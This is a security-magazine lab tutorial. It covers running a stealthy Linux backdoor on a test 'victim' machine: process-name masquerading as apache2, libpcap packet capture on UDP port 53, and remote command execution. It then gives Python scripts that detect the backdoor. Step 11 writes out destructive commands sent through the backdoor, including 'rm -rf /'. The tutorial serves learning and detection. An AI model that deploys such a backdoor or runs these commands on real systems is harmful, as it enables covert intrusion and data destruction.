Tutorial for the article Writing advanced Linux backdoors – packet sniffing

This document is a tutorial accompanying the article Writing advanced Linux backdoors – packet sniffing. The aim of the tutorial is to practise the use of the backdoor presented in the article.

We will run our tests on two computers connected by a local network. The first computer (green) will act as the victim's machine. We will boot it from the hakin9.live CD and run the backdoor on it.

The other computer (red) will act as the intruder's machine. It need not be booted from hakin9.live – any Linux will do.

[diagram: the two-computer test network, green (victim) and red (intruder)]

If you can't use two computers, you can execute the entire test on a single machine, but the result will not be as realistic.

Setup
A look at the backdoor
Using the backdoor
Can you detect the backdoor?

Setup

[01] Configure the local network according to the instructions found on the hakin9.live CD. Boot the green computer from hakin9.live, and boot up the red computer as well. Make sure the two can ping each other.


A look at the backdoor

Before we actually run the backdoor, it's worth having a look at what it does. Perform the steps outlined below on the green computer.

As you no doubt remember from the article, the backdoor code consists of three separate components: one that changes the process name, one that listens for packets on a specified port, and one that processes the packets received. Let's start by examining the component that changes the process name.


[02] Save to disk and examine the source code of mask_process_name.c (html). Compile it:

$ gcc mask_process_name.c -o mask_process_name

Now run it:

$ ./mask_process_name

[03] Use another terminal to examine the process list:

$ ps ax

As you can see, the process name is displayed as /usr/sbin/apache2.

[screenshot]
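The name shown by ps ax comes from the process's own argument vector (/proc/<pid>/cmdline), which is exactly what the renaming component rewrites. The kernel keeps a second record that user space cannot edit: /proc/<pid>/exe, a symlink to the binary that was actually executed. The following check, added here as an example and not part of the article's code, lists processes whose advertised name and real executable disagree; the function names are my own. Expect benign hits too (interpreters, daemons such as sshd that rewrite argv on purpose), so treat the output as a list to review rather than a verdict.

```python
import os

# Added example, not the article's code. Helper names are hypothetical.

def names_agree(claimed_argv0, real_exe):
    """True when the basename shown by `ps ax` (argv[0]) matches the basename
    of the binary the kernel loaded. A process can rewrite its argv; it cannot
    change what /proc/<pid>/exe points to."""
    return os.path.basename(claimed_argv0) == os.path.basename(real_exe)

def inspect_pid(pid):
    """Return (claimed_argv0, real_exe, comm) for one PID, or None when the
    entry cannot be read (kernel thread, process already gone, or another
    user's process inspected without root)."""
    base = "/proc/%d" % pid
    try:
        real_exe = os.readlink(base + "/exe")
        with open(base + "/cmdline", "rb") as f:
            claimed = f.read().split(b"\0", 1)[0].decode("utf-8", "replace")
        with open(base + "/comm") as f:
            comm = f.read().strip()
    except OSError:
        return None
    if not claimed:                        # kernel threads have an empty cmdline
        return None
    if real_exe.endswith(" (deleted)"):    # binary was unlinked after exec
        real_exe = real_exe[:-len(" (deleted)")]
    return claimed, real_exe, comm

def find_masquerading(pids=None):
    """Return [(pid, claimed, real_exe, comm), ...] for processes whose
    advertised name and real executable disagree. comm is reported as well
    because a process can change it with prctl(), so exe is the authority."""
    if pids is None:
        pids = [int(d) for d in os.listdir("/proc") if d.isdigit()]
    hits = []
    for pid in pids:
        info = inspect_pid(pid)
        if info is not None and not names_agree(info[0], info[1]):
            hits.append((pid,) + info)
    return hits

if __name__ == "__main__":
    # Run as root on the green computer while mask_process_name is running.
    for pid, claimed, real_exe, comm in find_masquerading():
        print("PID %d claims %r but exe is %s (comm=%s)" % (pid, claimed, real_exe, comm))
```

Run it as root on the green computer while mask_process_name is still running: the process that ps shows as /usr/sbin/apache2 appears with its real path in the exe column. The same comparison can be done by hand with ls -l /proc/<pid>/exe for any PID that looks suspicious.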


The next component of the backdoor is a loop that receives packets sent to a specific port.


[04] Save to disk and examine the source code for pcap_test.c (html). Compile it:

$ gcc pcap_test.c -o pcap_test -lpcap

Now run it as root:

# ./pcap_test

[05] From the red computer, send a test packet to UDP port 53 of the green computer.

$ hping <green_ip> -p 53 -2 -c 1

If you don't have hping, you can use netcat:

$ nc -u <green_ip> 53

Then type foobar, press [Enter] and finish with [ctrl+d].

[06] Go back to the green computer. Can you see a message informing you that the packet was received?

[screenshot]


Using the backdoor

[07] Save to disk and examine the source code for silentdoor.c (html). Have a look at the two components you already know (for changing the process name and receiving packets) and the component that processes received packets. Compile the program:

$ gcc silentdoor.c -o silentdoor -lpcap

Now run it as root:

# ./silentdoor

[08] On the red computer, save to disk the source code for key_open.c (html) – a program that allows you to send encrypted commands to the backdoor. Compile it:

$ gcc key_open.c -o key_open -lpcap

[09] Use the key_open program to send the victim a command to execute. To start with, try to create a file called xxxx. Remember to run the program as root:

# ./key_open <green_ip>:93 'touch xxxx'

[10] Go back to the green computer and stop the backdoor ([ctrl+c]). Now list the directory contents:

# ls

See the new file? Start the backdoor again.

[screenshot]


[11] Go back to the red computer. You can now execute any other commands, such as:

# ./key_open <green_ip>:93 'cat /dev/urandom > /dev/dsp'
# ./key_open <green_ip>:93 'eject'
# ./key_open <green_ip>:93 'rm -rf /'

Be careful! Remember that all your commands will actually be executed on the target system!


Can you detect the backdoor?

Now suppose that someone has managed to slip a similar backdoor into your system... Would you be able to detect it? Working on the green computer, try the following actions.


[12] Have a look at the system logs.

# tail /var/log/messages

Can you see any information that indicates the presence of a backdoor? Can you see anything to suggest there is a program listening for incoming packets?
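The logs are quiet for a reason that also explains why netstat shows nothing: the packet loop from steps [04] to [06] never binds UDP port 53. libpcap opens an AF_PACKET socket and reads every frame off the interface, so the usual "listening socket" views do not apply. Those sockets do leave a trace, though: /proc/net/packet lists every open packet socket with its inode, and the inode can be matched against /proc/<pid>/fd to find the owning process. The script below, added here as an example and not the article's code, does that mapping; the /proc/net/packet sample in it is constructed, and the function names are my own. DHCP clients, tcpdump/ethereal and some network managers open packet sockets legitimately, so the point is to account for every entry, not to expect an empty list.

```python
import os

# Added example, not the article's code. Constructed sample of
# /proc/net/packet; the socket addresses and inode values are made up.
SAMPLE_PROC_NET_PACKET = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a2b 3      3    0003   2     1 0      0      31337
ffff9a2c 3      2    0800   0     1 0      0      40001
"""

def parse_proc_net_packet(text):
    """Parse /proc/net/packet into one dict per AF_PACKET socket.
    Type: 3 = SOCK_RAW, 2 = SOCK_DGRAM (cooked). Proto is the ethertype in
    hex; 0003 is ETH_P_ALL ("every frame"), what a libpcap capture opens.
    Iface 0 means the socket is not bound to a single interface."""
    sockets = []
    for line in text.splitlines()[1:]:            # skip the header row
        fields = line.split()
        if len(fields) < 9:
            continue
        sockets.append({"type": int(fields[2]), "proto": int(fields[3], 16),
                        "iface": int(fields[4]), "uid": int(fields[7]),
                        "inode": int(fields[8])})
    return sockets

def pids_holding_inode(inode, proc="/proc"):
    """Map a socket inode to the PIDs that hold it as an open fd.
    /proc/<pid>/fd of other users' processes is only readable as root."""
    target = "socket:[%d]" % inode
    owners = set()
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        fd_dir = "%s/%s/fd" % (proc, entry)
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue
        for fd in fds:
            try:
                if os.readlink("%s/%s" % (fd_dir, fd)) == target:
                    owners.add(int(entry))
            except OSError:
                pass                              # fd closed while we looked
    return sorted(owners)

def capture_sockets(text=None):
    """Return [(inode, proto, uid, pids)] for every packet socket, reading
    the live /proc/net/packet unless text is supplied."""
    if text is None:
        with open("/proc/net/packet") as f:
            text = f.read()
    return [(s["inode"], s["proto"], s["uid"], pids_holding_inode(s["inode"]))
            for s in parse_proc_net_packet(text)]

if __name__ == "__main__":
    # Run as root on the green computer while silentdoor is running.
    for inode, proto, uid, pids in capture_sockets():
        print("packet socket inode %d proto 0x%04x uid %d held by %s"
              % (inode, proto, uid, pids or "<not visible, run as root>"))
```

Run as root while silentdoor is running and the process that ps reports as /usr/sbin/apache2 shows up holding an ETH_P_ALL socket, which a web server has no reason to own. Recent iproute2 gives the same view in one command with ss -0 -p (packet sockets with their owning processes).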


[13] Run ethereal:

# ethereal

Start a capture session on the appropriate network interface.


[14] Go back to the red computer and execute some remote commands, just like before. Have a look at the packets arriving at UDP port 53 of the green computer. Could you tell them apart from legitimate DNS replies?

[screenshot]
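A destination of UDP port 53 is all the backdoor packets share with DNS; their payload is an encrypted command, not a DNS message. A strict parser is therefore a usable first filter: a genuine reply is a 12-byte header followed by exactly the questions and resource records the header counts announce, with nothing left over. The parser below is added here as an example and is not the article's code; both sample payloads are constructed by hand and the function names are my own. It will not flag traffic that is wrapped inside well-formed DNS messages, so in ethereal also compare replies against the queries the green computer actually sent: a "reply" with no matching query is the other tell.

```python
import struct

# Added example, not the article's code. Helper names are hypothetical.

def _skip_name(buf, off, depth=0):
    """Walk a DNS name starting at buf[off]; return the offset just after it.
    Compression pointers (RFC 1035 4.1.4) must point backwards and their
    targets are validated recursively. Raises ValueError when malformed."""
    if depth > 16:
        raise ValueError("pointer chain too long")
    while True:
        if off >= len(buf):
            raise ValueError("name runs past end of message")
        length = buf[off]
        if length == 0:                           # root label ends the name
            return off + 1
        if length & 0xC0 == 0xC0:                 # 11xxxxxx: 14-bit pointer
            if off + 1 >= len(buf):
                raise ValueError("truncated pointer")
            target = ((length & 0x3F) << 8) | buf[off + 1]
            if target >= off:
                raise ValueError("pointer does not point backwards")
            _skip_name(buf, target, depth + 1)
            return off + 2
        if length & 0xC0:                         # 01/10 prefixes are reserved
            raise ValueError("reserved label type")
        off += 1 + length                         # ordinary label

def looks_like_dns(payload):
    """True only if the whole payload parses as one DNS message: a header
    whose section counts are matched by correctly framed questions and
    resource records, with no bytes left over."""
    if len(payload) < 12:
        return False
    _id, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    if flags & 0x0040:                            # Z bit is reserved, must be 0
        return False
    try:
        off = 12
        for _ in range(qd):
            off = _skip_name(payload, off) + 4    # QTYPE, QCLASS
        for _ in range(an + ns + ar):
            off = _skip_name(payload, off)
            if off + 10 > len(payload):           # TYPE CLASS TTL RDLENGTH
                return False
            rdlength = struct.unpack("!H", payload[off + 8:off + 10])[0]
            off += 10 + rdlength                  # ... then RDATA
    except ValueError:
        return False
    return off == len(payload)

def classify(payload):
    """Label a UDP/53 payload the way a capture review would."""
    return "dns" if looks_like_dns(payload) else "not-dns"

# Constructed: a minimal reply for example.com with one A record
# (93.184.216.34); the answer name is a pointer back to the question.
GOOD_DNS_REPLY = (struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
                  + b"\x07example\x03com\x00" + b"\x00\x01\x00\x01"
                  + b"\xc0\x0c" + b"\x00\x01\x00\x01" + b"\x00\x00\x0e\x10"
                  + b"\x00\x04" + b"\x5d\xb8\xd8\x22")

# Constructed: opaque bytes standing in for an encrypted command blob.
OPAQUE_BLOB = bytes.fromhex("4b1d9e07c3a85f2e6d0b7f91e4aa3c58d27b0e6f")

if __name__ == "__main__":
    print(classify(GOOD_DNS_REPLY), classify(OPAQUE_BLOB))
```

The parser is deliberately unforgiving: a truncated record, trailing bytes, a forward compression pointer or the reserved Z flag all fail it, because a resolver would never emit them while an opaque blob trips over one of them within the first few bytes.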


[15] Do you have any ideas for using knowledge gained from the article and this tutorial to detect the exploit and guard against it? If so, share them with others – visit our forum!